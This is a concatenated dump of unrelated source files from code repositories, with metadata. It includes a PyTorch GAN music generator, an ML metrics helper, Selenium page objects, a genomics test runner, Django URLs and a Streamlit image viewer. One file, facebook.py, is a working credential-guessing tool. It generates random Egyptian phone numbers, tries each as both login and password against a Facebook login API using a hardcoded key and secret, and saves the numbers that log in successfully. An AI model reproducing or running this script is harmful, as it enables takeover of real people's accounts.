h3_prev = lrelu(batch_norm_2d_cpu(self.h3_prev(h2_prev)),0.2) #[72, 16, 2, 1])
# yb = y.view(batch_size, self.y_dim, 1, 1) #(72,13,1,1)
# z = torch.cat((z,y),1) #(72,113)
h0 = F.relu(batch_norm_1d_cpu(self.linear1(z))) #(72,1024)
# h0 = torch.cat((h0,y),1) #(72,1037)
h1 = F.relu(batch_norm_1d_cpu(self.linear2(h0))) #(72, 256)
h1 = h1.view(batch_size, self.gf_dim * 2, 2, 1) #(72,128,2,1)
# h1 = conv_cond_concat(h1,yb) #(b,141,2,1)
h1 = conv_prev_concat(h1,h3_prev) #(72, 157, 2, 1)
h2 = F.relu(batch_norm_2d_cpu(self.h1(h1))) #(72, 128, 4, 1)
# h2 = conv_cond_concat(h2,yb) #([72, 141, 4, 1])
h2 = conv_prev_concat(h2,h2_prev) #([72, 157, 4, 1])
h3 = F.relu(batch_norm_2d_cpu(self.h2(h2))) #([72, 128, 8, 1])
# h3 = conv_cond_concat(h3,yb) #([72, 141, 8, 1])
h3 = conv_prev_concat(h3,h1_prev) #([72, 157, 8, 1])
h4 = F.relu(batch_norm_2d_cpu(self.h3(h3))) #([72, 128, 16, 1])
# h4 = conv_cond_concat(h4,yb) #([72, 141, 16, 1])
h4 = conv_prev_concat(h4,h0_prev) #([72, 157, 16, 1])
g_x = torch.sigmoid(self.h4(h4)) #([72, 1, 16, 128])
return g_x
class generator(nn.Module):
def __init__(self,pitch_range):
super(generator, self).__init__()
self.gf_dim = 64
# self.y_dim = 13
self.n_channel = 256
self.h1 = nn.ConvTranspose2d(in_channels=144, out_channels=pitch_range, kernel_size=(2,1), stride=(2,2))
self.h2 = nn.ConvTranspose2d(in_channels=25, out_channels=pitch_range, kernel_size=(2,1), stride=(2,2))
self.h3 = nn.ConvTranspose2d(in_channels=25, out_channels=pitch_range, kernel_size=(2,1), stride=(2,2))
self.h4 = nn.ConvTranspose2d(in_channels=25, out_channels=1, kernel_size=(1,pitch_range), stride=(1,2))
self.h0_prev = nn.Conv2d(in_channels=1, out_channels=16, kernel_size=(1,pitch_range), stride=(1,2))
self.h1_prev = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,1), stride=(2,2))
self.h2_prev = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,1), stride=(2,2))
self.h3_prev = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,1), stride=(2,2))
self.linear1 = nn.Linear(100,1024*2)
self.linear2 = nn.Linear(1024*2,self.gf_dim*2*2*1)
def forward(self, z, prev_x,batch_size,pitch_range):
# h3_prev = F.leaky_relu(self.batch_nor_256(self.h0_prev(prev_x)),0.2)
h0_prev = lrelu(batch_norm_2d(self.h0_prev(prev_x)),0.2) #[72, 16, 16, 1]
# print(h0_prev.size(),"h0_prev generator")
h1_prev = lrelu(batch_norm_2d(self.h1_prev(h0_prev)),0.2) #[72, 16, 8, 1]
# print(h1_prev.size(),"h1_prev generator")
h2_prev = lrelu(batch_norm_2d(self.h2_prev(h1_prev)),0.2) #[72, 16, 4, 1]
h3_prev = lrelu(batch_norm_2d(self.h3_prev(h2_prev)),0.2) #[72, 16, 2, 1])
# yb = y.view(batch_size, self.y_dim, 1, 1) #(72,13,1,1)
# z = torch.cat((z,y),1) #(72,113)
h0 = F.relu(batch_norm_1d(self.linear1(z))) #(72,1024)
# print(h0.size())
# h0 = torch.cat((h0,y),1) #(72,1037)
h1 = F.relu(batch_norm_1d(self.linear2(h0))) #(72, 256)
h1 = h1.view(batch_size, self.gf_dim * 2, 2, 1) #(72,128,2,1)
# print(h1.size(),"h1 size")
# h1 = conv_cond_concat(h1,yb) #(b,141,2,1)
h1 = conv_prev_concat(h1,h3_prev) #(72, 157, 2, 1)
# print(h1.size(),"h1 size")
h2 = F.relu(batch_norm_2d(self.h1(h1))) #(72, 128, 4, 1)
# print(h2.size(),"h2 size")
# h2 = conv_cond_concat(h2,yb) #([72, 141, 4, 1])
h2 = conv_prev_concat(h2,h2_prev) #([72, 157, 4, 1])
# print(h2.size(),"h2size")
h3 = F.relu(batch_norm_2d(self.h2(h2))) #([72, 128, 8, 1])
# print(h3.size(),"h3size")
# h3 = conv_cond_concat(h3,yb) #([72, 141, 8, 1])
h3 = conv_prev_concat(h3,h1_prev) #([72, 157, 8, 1])
h4 = F.relu(batch_norm_2d(self.h3(h3))) #([72, 128, 16, 1])
# print(h4.size(),"h4size")
# h4 = conv_cond_concat(h4,yb) #([72, 141, 16, 1])
h4 = conv_prev_concat(h4,h0_prev) #([72, 157, 16, 1])
g_x = torch.sigmoid(self.h4(h4)) #([72, 1, 16, 128])
# print(g_x.size())
return g_x
class discriminator(nn.Module):
def __init__(self,pitch_range):
super(discriminator, self).__init__()
self.df_dim = 64
self.dfc_dim = 1024*2
self.y_dim = 13
self.h0_prev = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=(2,pitch_range), stride=(2,2))
#out channels = y_dim +1
self.h1_prev = nn.Conv2d(in_channels=1, out_channels=77, kernel_size=(4,1), stride=(2,2))
# out channels = df_dim + y_dim
self.linear1 = nn.Linear(231,self.dfc_dim)
self.linear2 = nn.Linear(self.dfc_dim,1)
def forward(self,x,batch_size,pitch_range):
# yb = y.view(batch_size,self.y_dim, 1, 1)
# x = conv_cond_concat(x, yb) #x.shape torch.Size([72, 14, 16, 128])
h0 = lrelu(self.h0_prev(x),0.2)
fm = h0
# h0 = conv_cond_concat(h0, yb) #torch.Size([72, 27, 8, 1])
h1 = lrelu(batch_norm_2d(self.h1_prev(h0)),0.2) #torch.Size([72, 77, 3, 1])
# print(h1.size(),"h1 size dis")
h1 = h1.view(batch_size, -1) #torch.Size([72, 231])
# h1 = torch.cat((h1,y),1) #torch.Size([72, 244])
h2 = lrelu(batch_norm_1d(self.linear1(h1)))
# h2 = torch.cat((h2,y),1) #torch.Size([72, 1037])
h3 = self.linear2(h2)
h3_sigmoid = torch.sigmoid(h3)
return h3_sigmoid, h3, fm
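# A minimal smoke-test sketch (an illustration, not part of the original
# training code). The layer sizes above are mutually consistent for
# pitch_range = 9, i.e. bars of shape (batch, 1, 16, 9); the inline shape
# comments mentioning width 128 are leftovers from a conditioned variant.
# Assumes the lrelu / batch_norm_*_cpu / conv_prev_concat helpers in ops.py
# have the semantics used above.
if __name__ == '__main__':
    batch_size, pitch_range = 72, 9
    netG = sample_generator()  # CPU variant defined above
    z = torch.randn(batch_size, 100)
    prev_x = torch.randn(batch_size, 1, 16, pitch_range)
    g_x = netG(z, prev_x, batch_size, pitch_range)
    print(g_x.size())  # expected: (72, 1, 16, 9)
    # discriminator(pitch_range) consumes g_x the same way, but relies on the
    # non-_cpu batch-norm helpers, which may expect a GPU:
    # d_prob, d_logits, fm = discriminator(pitch_range)(g_x, batch_size, pitch_range)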
|
[
"frederic.tamagnan@gmail.com"
] |
frederic.tamagnan@gmail.com
|
caccd1355ec8d538d438f380c59e87e6f0d3d43c
|
ba80848eab0bdbbf73bc79c1b88cff32b2f83b61
|
/hands-on-ml-zh/02/main.py
|
1c6798ff7d332418b4f0bd71e60545775b322886
|
[] |
no_license
|
1SOU/2019ex
|
9c4cffbeeb0a476c8606348a77e2847d5b8ef362
|
7f0076a455533bf09f30b274fb06d16bdbc3398b
|
refs/heads/master
| 2020-07-26T15:03:04.084831
| 2019-09-16T01:33:50
| 2019-09-16T01:33:50
| 208,685,009
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 86
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 22 09:10:46 2019
@author: Yisoul
"""
|
[
"2381824597@qq.com"
] |
2381824597@qq.com
|
ee206e8d4a00724240ebf254d91d1e8941978264
|
a6355ef8ddb4d31fb4ff45ae755f34482d8c0ff9
|
/supervised/models/compute_additional_metrics.py
|
e74e522c6eeaa975273774befac8d3433b6506e2
|
[
"MIT"
] |
permissive
|
michaelneale/mljar-supervised
|
d4d1b44f4cd5dcbdb36768c5186f2480a53ec3f7
|
8d1b5fdd56e994a7f13ec5f6d2033830744f3d6f
|
refs/heads/master
| 2022-02-06T14:11:21.377791
| 2019-11-05T08:15:02
| 2019-11-05T08:15:02
| 220,161,447
| 0
| 0
|
MIT
| 2022-01-26T00:32:56
| 2019-11-07T05:51:34
| null |
UTF-8
|
Python
| false
| false
| 3,084
|
py
|
import logging
import copy
import numpy as np
import pandas as pd
import time
import uuid
from supervised.tuner.registry import BINARY_CLASSIFICATION
from sklearn.metrics import (
f1_score,
accuracy_score,
precision_score,
recall_score,
matthews_corrcoef,
roc_auc_score,
confusion_matrix,
)
log = logging.getLogger(__name__)
class ComputeAdditionalMetrics:
@staticmethod
def compute(target, predictions, ml_task):
if ml_task != BINARY_CLASSIFICATION:
return {}
sorted_predictions = np.sort(predictions)
STEPS = 100
details = {
"threshold": [],
"f1": [],
"accuracy": [],
"precision": [],
"recall": [],
"mcc": [],
}
samples_per_step = max(1, np.floor(predictions.shape[0] / STEPS))
for i in range(1, STEPS):
idx = int(i * samples_per_step)
if idx + 1 >= predictions.shape[0]:
break
th = 0.5 * (sorted_predictions[idx] + sorted_predictions[idx + 1])
if np.sum(predictions > th) < 1:
break
response = (predictions > th).astype(int)
details["threshold"] += [th]
details["f1"] += [f1_score(target, response)]
details["accuracy"] += [accuracy_score(target, response)]
details["precision"] += [precision_score(target, response)]
details["recall"] += [recall_score(target, response)]
details["mcc"] += [matthews_corrcoef(target, response)]
# max metrics
max_metrics = {
"auc": {
"score": roc_auc_score(target, predictions),
"threshold": None,
}, # there is no threshold for AUC :)
"f1": {
"score": np.max(details["f1"]),
"threshold": details["threshold"][np.argmax(details["f1"])],
},
"accuracy": {
"score": np.max(details["accuracy"]),
"threshold": details["threshold"][np.argmax(details["accuracy"])],
},
"precision": {
"score": np.max(details["precision"]),
"threshold": details["threshold"][np.argmax(details["precision"])],
},
"recall": {
"score": np.max(details["recall"]),
"threshold": details["threshold"][np.argmax(details["recall"])],
},
"mcc": {
"score": np.max(details["mcc"]),
"threshold": details["threshold"][np.argmax(details["mcc"])],
},
}
# confusion matrix
conf_matrix = confusion_matrix(
target, predictions > max_metrics["f1"]["threshold"]
)
conf_matrix = pd.DataFrame(
conf_matrix,
columns=["Predicted as negative", "Predicted as positive"],
index=["Labeled as negative", "Labeled as positive"],
)
return pd.DataFrame(details), pd.DataFrame(max_metrics), conf_matrix
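# A hypothetical usage sketch (illustrative values; assumes the package is
# importable so the registry import above resolves):
if __name__ == "__main__":
    y_true = np.array([0, 1, 1, 0, 1, 0, 1, 1])
    y_scores = np.array([0.2, 0.8, 0.7, 0.4, 0.9, 0.1, 0.6, 0.3])
    details, max_metrics, conf_matrix = ComputeAdditionalMetrics.compute(
        y_true, y_scores, BINARY_CLASSIFICATION
    )
    print(max_metrics)  # per-metric best score and the threshold achieving it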
|
[
"pplonski86@gmail.com"
] |
pplonski86@gmail.com
|
6118aac454787deedc978d8651554562c83be1cd
|
f0dd1343ad57362c91c19d1ae46089e33777b988
|
/pageobjects/ResourceManage/GroupResource_page.py
|
e85491bc23b2c8d890763d5caa8d8153f76e38d2
|
[] |
no_license
|
heshuiming/AutoTest
|
f786b1feee02bf94d6e8f0adec4eda2861a933a4
|
03440ca956e469733b4f4000af40f93625b2a4ee
|
refs/heads/master
| 2020-05-14T23:30:24.713383
| 2019-04-29T11:03:29
| 2019-04-29T11:03:29
| 181,997,942
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,206
|
py
|
from unit.base_page import BasePage
from time import sleep
# Resources owned by this group
class GroupResourcePage(BasePage):
    # Consultation category
    consultation_1 = "xpath=>//label[contains(text(),'咨询类别')]/../a[contains(text(),'雅思')]"  # IELTS
    consultation_2 = "xpath=>//label[contains(text(),'咨询类别')]/../a[contains(text(),'北美')]"  # North America
    consultation_8 = "xpath=>//label[contains(text(),'咨询类别')]/../a[contains(text(),'大客户')]"  # Key accounts
    consultation_11 = "xpath=>//label[contains(text(),'咨询类别')]/../a[contains(text(),'加拿大留学')]"  # Study in Canada
    consultation_12 = "xpath=>//label[contains(text(),'咨询类别')]/../a[contains(text(),'澳大利亚留学')]"  # Study in Australia
def Consultation(self, consultation):
if consultation == 1:
self.click(self.consultation_1)
elif consultation == 2:
self.click(self.consultation_2)
elif consultation == 8:
self.click(self.consultation_8)
elif consultation == 11:
self.click(self.consultation_11)
elif consultation == 12:
self.click(self.consultation_12)
else:
print("请给出正确的咨询方向!")
    # Source
    source_type_0 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'客服')]"  # Customer service
    source_type_1 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'销售')]"  # Sales
    source_type_2 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'市场活动')]"  # Marketing campaign
    source_type_3 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'渠道')]"  # Channel partner
    source_type_4 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'TMK')]"  # TMK (telemarketing)
    source_type_6 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'新媒体')]"  # New media
    source_type_7 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'其他学校')]"  # Other schools
    source_type_8 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'口碑资源')]"  # Word-of-mouth referral
    source_type_9 = "xpath=>//label[contains(text(),'来源')]/../a[contains(text(),'搜课')]"  # Souke (course-search platform)
def Source(self, type):
if type == 1:
self.click(self.source_type_0)
elif type == 2:
self.click(self.source_type_1)
elif type == 3:
self.click(self.source_type_2)
elif type == 4:
self.click(self.source_type_3)
elif type == 5:
self.click(self.source_type_4)
elif type == 6:
self.click(self.source_type_6)
elif type == 7:
self.click(self.source_type_7)
elif type == 8:
self.click(self.source_type_8)
elif type == 9:
self.click(self.source_type_9)
# elif type == 10:
# self.click(self.infomationType_10)
# elif type == 11:
# self.click(self.infomationType_11)
else:
print("请给出正确的来源")
    # Search
counselorName_input = "xpath=>//input[@placeholder='当前负责人']"
studentName_input = "xpath=>//input[@placeholder='学员姓名']"
telephone_input = "xpath=>//input[@placeholder='手机号']"
# pid_input = "name=>pid"
search_btn = "id=>search"
    def SearchCondition(self, **info):
        # Use dict.get so that omitted keyword arguments do not raise KeyError
        if info.get('counselorName'):
            self.send_keys(self.counselorName_input, info['counselorName'])
            self.click(self.search_btn)
        elif info.get('studentName'):
            self.send_keys(self.studentName_input, info['studentName'])
            self.click(self.search_btn)
        elif info.get('telephone'):
            self.send_keys(self.telephone_input, info['telephone'])
            self.click(self.search_btn)
        # elif info.get('pid'):
        #     self.send_keys(self.pid_input, info['pid'])
        #     self.click(self.search_btn)
        else:
            self.click(self.search_btn)
    # View
check_btn = "xpath=>//tbody/tr[1]/td[2]/div/button"
def Check(self):
self.click(self.check_btn)
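# A hypothetical usage sketch (driver setup and the BasePage wiring belong to
# the surrounding framework; the values are illustrative):
# page = GroupResourcePage(driver)
# page.Consultation(1)                    # filter by the IELTS category
# page.Source(2)                          # filter by the sales source
# page.SearchCondition(studentName='Zhang San')
# page.Check()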
|
[
"heshuiming@pxjy.com"
] |
heshuiming@pxjy.com
|
8ed898a821efe6042373dea98279e07c01c08044
|
e006ba80e39ed9cfda121881f03a62c097cb4614
|
/gcp_variant_transforms/testing/integration/run_tests_common.py
|
4fe4bb677249af2fbbccf33b614cf17ec9d343b1
|
[
"Apache-2.0"
] |
permissive
|
thuylevn/gcp-variant-transforms
|
aee27f061451a5f23b7d3024f65eda1c2ab52bec
|
d0b77a6acdf3f0a0d1274fe4eb54d6ee27ce427a
|
refs/heads/master
| 2020-07-10T16:51:40.954884
| 2019-08-20T14:40:26
| 2019-08-20T14:40:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,452
|
py
|
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common functions and classes that are used by integration tests.
It provides common functions and classes for both run_vcf_to_bq_tests
(integration test script for vcf_to_bq pipeline) and run_preprocessor_tests
(integration test script for vcf_to_bq_preprocess pipeline).
"""
import argparse # pylint: disable=unused-import
import json
import os
import subprocess
import time
from collections import namedtuple
from typing import Dict, List, Optional # pylint: disable=unused-import
_DEFAULT_IMAGE_NAME = 'gcr.io/cloud-lifesciences/gcp-variant-transforms'
_DEFAULT_ZONES = ['us-east1-b']
# `TestCaseState` saves current running test and the remaining tests in the same
# test script (.json).
TestCaseState = namedtuple('TestCaseState',
['running_test', 'remaining_tests'])
class TestCaseInterface(object):
"""Interface of an integration test case."""
def validate_result(self):
"""Validates the result of the test case."""
raise NotImplementedError
class TestCaseFailure(Exception):
"""Exception for failed test cases."""
pass
class TestRunner(object):
"""Runs the tests using pipelines API."""
def __init__(self, tests, revalidate=False):
# type: (List[List[TestCaseInterface]], bool) -> None
"""Initializes the TestRunner.
Args:
tests: All test cases.
revalidate: If True, only run the result validation part of the tests.
"""
self._tests = tests
self._revalidate = revalidate
self._test_names_to_test_states = {} # type: Dict[str, TestCaseState]
self._test_names_to_processes = {} # type: Dict[str, subprocess.Popen]
def run(self):
"""Runs all tests."""
if self._revalidate:
for test_cases in self._tests:
# Only validates the last test case in one test script since the table
# created by one test case might be altered by the following up ones.
test_cases[-1].validate_result()
else:
for test_cases in self._tests:
self._run_test(test_cases)
self._wait_for_all_operations_done()
def _run_test(self, test_cases):
# type: (List[TestCaseInterface]) -> None
"""Runs the first test case in `test_cases`.
The first test case and the remaining test cases form `TestCaseState` and
are added into `_test_names_to_test_states` for future usage.
"""
if not test_cases:
return
self._test_names_to_test_states.update({
test_cases[0].get_name(): TestCaseState(test_cases[0], test_cases[1:])})
self._test_names_to_processes.update(
{test_cases[0].get_name(): subprocess.Popen(
test_cases[0].run_test_command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)})
def _wait_for_all_operations_done(self):
"""Waits until all operations are done."""
while self._test_names_to_processes:
time.sleep(10)
      running_test_names = list(self._test_names_to_processes.keys())  # copy, since entries are deleted below
for test_name in running_test_names:
running_proc = self._test_names_to_processes.get(test_name)
return_code = running_proc.poll()
if return_code is not None:
test_case_state = self._test_names_to_test_states.get(test_name)
self._handle_failure(running_proc, test_case_state.running_test)
del self._test_names_to_processes[test_name]
test_case_state.running_test.validate_result()
self._run_test(test_case_state.remaining_tests)
def _handle_failure(self, proc, test_case):
"""Raises errors if test case failed."""
if proc.returncode != 0:
stdout, stderr = proc.communicate()
raise TestCaseFailure('Test case {} failed. stdout: {}, stderr: {}, '
'return code: {}.'.format(test_case.get_name(),
stdout, stderr,
proc.returncode))
def print_results(self):
"""Prints results of test cases."""
for test_cases in self._tests:
for test_case in test_cases:
        print('{} ...ok'.format(test_case.get_name()))
return 0
def form_command(project, temp_location, image, tool_name, zones, args):
# type: (str, str, str, str, Optional[List[str]], List[str]) -> List[str]
return ['/opt/gcp_variant_transforms/src/docker/pipelines_runner.sh',
'--project', project,
'--docker_image', image,
'--temp_location', temp_location,
'--zones', str(' '.join(zones or _DEFAULT_ZONES)),
' '.join([tool_name] + args)]
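# For illustration (hypothetical values), the call
#   form_command('my-project', 'gs://my-bucket/tmp', _DEFAULT_IMAGE_NAME,
#                'vcf_to_bq', None, ['--input_pattern', 'gs://my-bucket/*.vcf'])
# yields the pipelines_runner.sh invocation above with the default
# us-east1-b zone.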
def add_args(parser):
# type: (argparse.ArgumentParser) -> None
"""Adds common arguments."""
parser.add_argument('--project', required=True)
parser.add_argument('--staging_location', required=True)
parser.add_argument('--temp_location', required=True)
parser.add_argument('--logging_location', required=True)
parser.add_argument(
'--image',
help=('The name of the container image to run the test against it, for '
'example: gcr.io/test-gcp-variant-transforms/'
'test_gcp-variant-transforms_2018-01-20-13-47-12. By default the '
'production image {} is used.').format(_DEFAULT_IMAGE_NAME),
default=_DEFAULT_IMAGE_NAME,
required=False)
def get_configs(test_file_dir, required_keys, test_file_suffix=''):
# type: (str, List[str], str) -> List[List[Dict]]
"""Gets test configs.
Args:
test_file_dir: The directory where the test cases are saved.
required_keys: The keys that are required in each test case.
test_file_suffix: If empty, all test cases in `test_file_path` are
considered. Otherwise, only the test cases that end with this suffix will
run.
Raises:
TestCaseFailure: If no test cases are found.
"""
test_configs = []
test_file_suffix = test_file_suffix or '.json'
for root, _, files in os.walk(test_file_dir):
for filename in files:
if filename.endswith(test_file_suffix):
test_configs.append(_load_test_configs(os.path.join(root, filename),
required_keys))
if not test_configs:
raise TestCaseFailure('Found no {} file in directory {}'.format(
test_file_suffix, test_file_dir))
return test_configs
def _load_test_configs(filename, required_keys):
# type: (str, List[str]) -> List[Dict]
"""Loads an integration test JSON object from a file."""
with open(filename, 'r') as f:
tests = json.loads(f.read())
_validate_test_configs(tests, filename, required_keys)
return tests
def _validate_test_configs(test_configs, filename, required_keys):
# type: (List[Dict], str, List[str]) -> None
for key in required_keys:
for test_config in test_configs:
if key not in test_config:
raise ValueError('Test case in {} is missing required key: {}'.format(
filename, key))
|
[
"noreply@github.com"
] |
thuylevn.noreply@github.com
|
4d14e85f72f60042cb859ef7ccddd176ed9c872b
|
64e8f8e7ede25b76997e77c09204679f63ffb946
|
/activities/urls.py
|
a2101fd407fe31a9a7e39e83f5b0e81a3efed336
|
[] |
no_license
|
noelroy/pharmacy
|
f4f1849e678bd4715d05ea710c78e65c666e57d9
|
b2a90f5622b21ac60a189b9b17ba7511cd344c54
|
refs/heads/master
| 2021-09-08T14:59:10.383647
| 2021-08-25T18:45:26
| 2021-08-25T18:45:26
| 84,398,400
| 7
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
py
|
from django.conf.urls import url
from activities import views
urlpatterns = [
url(r'^orders/create$', views.create_order, name='create_order'),
url(r'^orders/get_company_list$', views.get_company_list, name='get_company_list_order'),
]
|
[
"noelroy96@gmail.com"
] |
noelroy96@gmail.com
|
4114e81d545e8d1b52a61627033bba787df43ae4
|
e67cef71640b868ac23f750ef6a485bd938013df
|
/facebook.py
|
a2f411f13ddc72551c24118ff8a5a7ccf76ab208
|
[] |
no_license
|
mahmoudhany1/facebookCreator
|
58b879027591dc6920577c638357c1b3187881cc
|
93567c7f1389ad22f13d6617556ed5020fb86bbe
|
refs/heads/master
| 2020-03-31T14:43:29.975718
| 2018-10-09T19:09:41
| 2018-10-09T19:09:41
| 152,306,726
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,690
|
py
|
print """ Mahmoud Hany Security
Thise Script Maded By Abo Hany 1 Pas Hhhhh
Thise Script Maded By Abo Hany 1 Pas Hhhhh
Thise Script Maded By Abo Hany 1 Pas Hhhhh
Thise Script Maded By Abo Hany 1 Pas Hhhhh
Thise Script Maded By Abo Hany 1 Pas Hhhhh
Thise Script Maded By Abo Hany 1 Pas Hhhhh
My Acount On Facebook
https://www.facebook.com/mahmoudhanyhack
"""
import threading
import random
import string
import hashlib
import json
from urllib import urlencode
import collections
import urllib2
import sys
import os
os.system('color 6')
raw_input ("Enter Number Of Acounts : ")
print """
Now is Get Acounts ^_^
"""
phoneLen = 11
providers = ["012","015","011","010"]
Threadtimeout = 5
ThreadPoolSize = 20
storeThreads = []
validhits = set()
def threadManager(function,Funcargs,Startthreshold,Threadtimeout=5):
if len(storeThreads) != Startthreshold:
storeThreads.append(threading.Thread(target=function,args=tuple(Funcargs) ))
if len(storeThreads) == Startthreshold:
for metaThread in storeThreads:
metaThread.start()
for metaThread in storeThreads:
metaThread.join(Threadtimeout)
del storeThreads[::]
def accessToken(email,password):
data = collections.OrderedDict()
data["api_key"] = "882a8490361da98702bf97a021ddc14d"
data["email"] = str(email)
data["format"]= "JSON"
data["locale"] = "vi_vn"
data["method"] = "auth.login"
data["password"] = str(password)
data["return_ssl_resources"] = "0"
data["v"] = "1.0"
sig = ""
for key in data:
sig += "{0}={1}".format(key,data[key])
data["sig"] = hashlib.md5(sig+"62f8ce9f74b12f84c123cc23437a4a32").hexdigest()
try:
return json.loads(urllib2.urlopen("https://api.facebook.com/restserver.php?{0}".format(urlencode(data))).read())["access_token"]
except:
return False
def login(n):
status = accessToken(n,n)
if status != False:
validhits.add(n)
def GenPhoneNumber():
provider = providers[random.randint(0,len(providers)-1 )]
numbers = (''.join(random.choice(string.digits) for i in range(phoneLen - len(provider) )))
return "{}{}".format(provider,numbers)
old = 0
while(1):
threadManager( login, [GenPhoneNumber()] , ThreadPoolSize ,Threadtimeout)
if len(validhits) != old:
for n in validhits:
open("acounts.txt","a").write(str(n)+"\n")
r = set(open("acounts.txt","r").read().split("\n"))
open("acounts.txt","w").write("")
for n in r:
open("acounts.txt","a").write(str(n)+"\n")
old = len(validhits)
print " You Have {} Acount ^_^ : ".format(len(validhits))
|
[
"noreply@github.com"
] |
mahmoudhany1.noreply@github.com
|
5ff41892cdff2e8c2bf0ec19a9f07d27a6f47528
|
4c6d13afe5a6846be002248774261309ad4a9445
|
/learning_templates/basic_app/urls.py
|
1d6e16827193d75966bfc84f8880b2f3f4faa1af
|
[] |
no_license
|
JiGzZz/django-deployment-example
|
8629007c7fd95f3ed54c0a51dd8036512943a184
|
e207ea950dc4e197262b5f65a83c2dd4851483d5
|
refs/heads/master
| 2020-04-17T12:35:18.985796
| 2019-01-19T20:22:58
| 2019-01-19T20:22:58
| 166,585,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 212
|
py
|
from django.urls import path
from basic_app import views
# TEMPLATE TAGGING: app_name registers a URL namespace so templates can
# reverse these routes, e.g. {% url 'basic_app:relative' %}
app_name = 'basic_app'
urlpatterns = [
path('relative/',views.relative,name='relative'),
path('other/',views.other,name='other'),
]
|
[
"developer.jigardhulla@gmail.com"
] |
developer.jigardhulla@gmail.com
|
472cadaf32afaeb4b58e1c709b41a3c59a831a37
|
2e56d10d7b8def30dcc46b2a0240ee702caf393d
|
/stream.py
|
e9e2f73b105c55bdf6c2f87f913f5b5fef6b3f81
|
[] |
no_license
|
sweetcocoa/streamlit_image_explorer
|
15309380e56b555fe3fb54cb7fe979d8b5e1d649
|
70a3b0f017bc0e552180f9e03ea3a7d4d099c7ec
|
refs/heads/main
| 2023-06-19T17:52:23.660373
| 2021-07-09T05:41:36
| 2021-07-09T05:41:36
| 379,520,194
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,256
|
py
|
import streamlit as st
import numpy as np
import os
import urllib
import glob
import SessionState
import cv2
# DATA_URL_ROOT = st.secrets['DATA_URL_ROOT']
# DATA_URL_ROOT = "data/"
DATA_URL_ROOT = (
"https://raw.githubusercontent.com/sweetcocoa/streamlit_image_explorer/master/"
)
session_state = SessionState.get(image_idx=0)
files = dict(train=list(), val=list())
data_split = "train"
test_on_local = False
if test_on_local:
def get_file_list(base_path):
images = sorted(glob.glob(f"{base_path}/**/*.png", recursive=True))
images = [image.replace("\\", "/") for image in images]
return images
@st.cache(show_spinner=False)
def get_file_content_as_string(path):
return open(path, "r").read()
@st.cache(show_spinner=False)
def load_image(url, resize=None):
image = cv2.imread(url, cv2.IMREAD_COLOR)
if resize is not None:
image = cv2.resize(image, dsize=resize, interpolation=cv2.INTER_LINEAR)
image = image[:, :, [2, 1, 0]] # BGR -> RGB
return image
else:
def get_file_list(base_path):
images = sorted(glob.glob(f"{base_path}/**/*.png", recursive=True))
images = [(DATA_URL_ROOT + image).replace("\\", "/") for image in images]
return images
@st.cache(show_spinner=False)
def get_file_content_as_string(path):
global DATA_URL_ROOT
url = DATA_URL_ROOT + path
response = urllib.request.urlopen(url)
return response.read().decode("utf-8")
@st.cache(show_spinner=False)
def load_image(url, resize=None):
with urllib.request.urlopen(url) as response:
image = np.asarray(bytearray(response.read()), dtype="uint8")
image = cv2.imdecode(image, cv2.IMREAD_COLOR)
if resize is not None:
image = cv2.resize(image, dsize=resize, interpolation=cv2.INTER_LINEAR)
image = image[:, :, [2, 1, 0]] # BGR -> RGB
return image
def label_of(path):
return path.split("/")[-2]
def split_of(path):
# print(path)
return path.split("/")[-3]
def image_explorer():
global session_state, data_split, files
image_idx = session_state.image_idx
title_columns = st.beta_columns(2)
data_split = title_columns[0].radio("Choose data split", ("train", "val"))
is_resized = title_columns[1].checkbox(
"Resize",
value=False,
)
# data_split = st.
num_images_row = st.slider(
"Number of Images in a Row",
min_value=1,
max_value=10,
value=1,
step=1,
format=None,
key=None,
help=None,
)
num_images_col = 5
number_of_images_in_page = int(num_images_col * num_images_row)
    explorer_buttons = st.beta_columns(2)
    prev_button = explorer_buttons[0].button("Prev Images")
    next_button = explorer_buttons[1].button("Next Images")
if prev_button:
image_idx = max(image_idx - number_of_images_in_page, 0)
session_state.image_idx = image_idx
if next_button:
image_idx = min(image_idx + number_of_images_in_page, len(files[data_split]))
session_state.image_idx = image_idx
st.header(
f"Images from {image_idx} to {min(len(files[data_split]), image_idx + num_images_col * (num_images_row))} / {len(files[data_split])}"
)
columns = st.beta_columns(num_images_row)
for i in range(len(columns)):
start_idx = image_idx + i * num_images_col
end_idx = min(start_idx + num_images_col, len(files[data_split]))
# print(start_idx, end_idx)
if not is_resized:
columns[i].image(
files[data_split][start_idx:end_idx],
caption=[
f"{label_of(files[data_split][i])}, {i}"
for i in range(start_idx, end_idx)
],
)
else:
columns[i].image(
[
load_image(files[data_split][i], resize=(32, 32))
for i in range(start_idx, end_idx)
],
caption=[
f"{label_of(files[data_split][i])}, {i}"
for i in range(start_idx, end_idx)
],
)
def main():
global files
